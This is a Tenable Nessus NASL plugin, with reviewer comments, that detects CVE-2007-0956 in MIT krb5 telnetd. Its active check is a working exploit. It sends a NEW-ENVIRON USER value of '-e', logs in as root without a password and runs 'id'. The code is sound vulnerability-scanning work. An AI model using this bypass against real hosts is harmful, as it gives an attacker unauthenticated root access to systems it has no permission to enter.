Kerberos telnet authentication bypass via crafted username
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# Need Nessus 2.2.9 or newer
# Engine gate: silently stop on engines older than 2.2.9 (see the header comment).
# A plain exit(0) is used rather than audit() because audit.inc is only included
# further down, after the description block.
if (NASL_LEVEL < 2204 ) exit(0);
include('deprecated_nasl_level.inc');
include('compat.inc');
# Plugin registration. This branch runs only when the engine loads the script to
# collect its metadata; it exits before the active check below is reached.
if (description)
{
script_id(24998);
script_version("1.29");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2007-0956");
script_bugtraq_id(23281);
script_xref(name:"CERT", value:"220816");
script_name(english:"Kerberos telnet Crafted Username Remote Authentication Bypass");
script_set_attribute(attribute:"synopsis", value:
"It is possible to log into the remote host using telnet without
supplying any credentials.");
script_set_attribute(attribute:"description", value:
"An authentication bypass vulnerability exists in the MIT krb5 telnet
daemon due to a failure to sanitize malformed usernames. This allows
usernames beginning with '-e' to be interpreted as a command-line flag
by the login.krb5 program. A remote attacker can exploit this, via a
crafted username, to cause login.krb5 to execute part of the BSD
rlogin protocol, which in turn allows the attacker to login with an
arbitrary username without a password or any further authentication.");
# http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0ed21002");
script_set_attribute(attribute:"solution", value:
"Apply the fixes described in MIT krb5 Security Advisory 2007-001, or
contact your vendor for a patch.");
# NOTE(review): the CVSS2 vector rates attack complexity High (AC:H) while the
# CVSS3 vector rates it Low (AC:L). Both are Tenable's published values and are
# left as-is here; the mismatch is worth knowing when comparing scores.
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");
script_set_attribute(attribute:"vuln_publication_date", value:"2007/04/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2007/04/05");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:mit:kerberos");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
# ACT_ATTACK: the check is intrusive. On success it actually authenticates to the
# target and executes a command there (see local_telnet_callback below), which is
# why the result is reported as a security_hole with the command output.
script_category(ACT_ATTACK);
script_family(english:"Gain a shell remotely");
script_copyright(english:"This script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Needs the telnet service discovered first; does not run when the scan policy
# restricts authentication to user-supplied logins only (the check logs in with none).
script_dependencies("find_service1.nasl");
script_exclude_keys("global_settings/supplied_logins_only");
script_require_ports("Services/telnet", 23);
exit(0);
}
# Runtime includes for the active check (telnet2_func.inc provides the option
# negotiation and the telnet loop used below; data_protection.inc the uid sanitiser).
include ("global_settings.inc");
include ("audit.inc");
include ("byte_func.inc");
include ("telnet2_func.inc");
include("data_protection.inc");
# Honour the "supplied logins only" policy: this check authenticates to the
# target without any credential the user supplied, so it must not run then.
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
# Telnet port as recorded by find_service1.nasl; fall back to the default 23.
port = get_kb_item("Services/telnet");
if (!port) port = 23;
# State shared with local_telnet_callback(): rcvdata accumulates received bytes,
# idstate is the step of the login state machine. idsent is declared but not
# referenced anywhere in this file as shown.
global_var rcvdata, idsent, idstate;
# Callback handed to telnet_loop(); receives the incoming data as its anonymous
# argument and drives a three-step state machine over the global idstate:
#   0 - nothing sent yet
#   1 - waiting for the doubled "login: login:" prompt
#   2 - command sent, waiting for the output of "id"
# Every exit(0) in here terminates the whole plugin, not just this callback, so a
# host that answers with a password prompt simply produces no finding.
function local_telnet_callback ()
{
local_var data;
data = _FCT_ANON_ARGS[0];
# Only the first byte of each delivery is appended, and NUL / CR bytes are dropped.
# NOTE(review): if telnet_loop() can deliver more than one byte per call, the
# remaining bytes are discarded here and later prompt matches could be missed -
# confirm the callback contract against telnet2_func.inc.
if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d)
rcvdata += data[0];
# Not vulnerable (or not the expected service): a password or usage prompt at any
# stage means the username was not accepted as described in the advisory; stop
# without reporting.
# NOTE(review): the idstate == 0 "login:" branch looks unreachable as written -
# rcvdata holds at most one byte while idstate is 0, because the block below
# advances the state in the same call.
if ( (idstate == 0 && (egrep(pattern:"login:", string:rcvdata, icase:TRUE))) ||
egrep(pattern:"(password|usage):", string:rcvdata, icase:TRUE) )
{
exit(0);
}
# Step 0: on the first delivery send a throwaway line and an empty line, clear the
# buffer and start waiting for the doubled login prompt. This runs even when the
# received byte was filtered out above.
if (idstate == 0)
{
telnet_write('plop\r\0');
telnet_write('\0\r\0');
rcvdata = NULL;
idstate = 1;
}
# Step 1: the doubled prompt has been seen; send the username and the id command.
if (idstate == 1 && "login: login:" >< rcvdata)
{
rcvdata = NULL;
telnet_write('root\r\0');
telnet_write('id\r\0');
idstate = 2;
}
# Step 2: a "uid=" line is the evidence of a successful login. Only the sanitised
# uid line is included in the report; the session is closed and the plugin ends.
if (idstate == 2 && "uid=" >< rcvdata)
{
security_hole(port:port, extra:'It was possible to log in and execute "id" : \n\n' + data_protection::sanitize_uid(output:egrep(pattern:"uid=", string:rcvdata)));
telnet_write('exit\r\0');
exit(0);
}
}
# Reset the state shared with the callback before any negotiation starts.
rcvdata = NULL;
idstate = 0;
# NEW-ENVIRON payload carrying the USER value described in the plugin description.
# The mkbyte() values are NEW-ENVIRON type codes (RFC 1572: 0 = VAR, 1 = VALUE).
# NOTE(review): whether the leading 0 is the IS subcommand or is otherwise expected
# by telnet2_init() is not visible here - check telnet2_func.inc.
# A patched login.krb5 answers with a password prompt, which the callback treats
# as "not vulnerable".
env_data =
mkbyte(0) +
mkbyte(0) + "USER" +
mkbyte(1) + "-e";
# Option list for telnet2_init(); OPT_NEW_ENV is presumably defined in telnet2_func.inc.
options = NULL;
options[0] = make_list(OPT_NEW_ENV, env_data);
# Connect and negotiate with a 10 s timeout; on failure exit silently (no audit).
if (!telnet2_init(options:options, timeout:10))
exit(0);
# Hand control to the telnet loop; local_telnet_callback() does the rest and reports.
telnet_loop(telnet_callback_fn:@local_telnet_callback);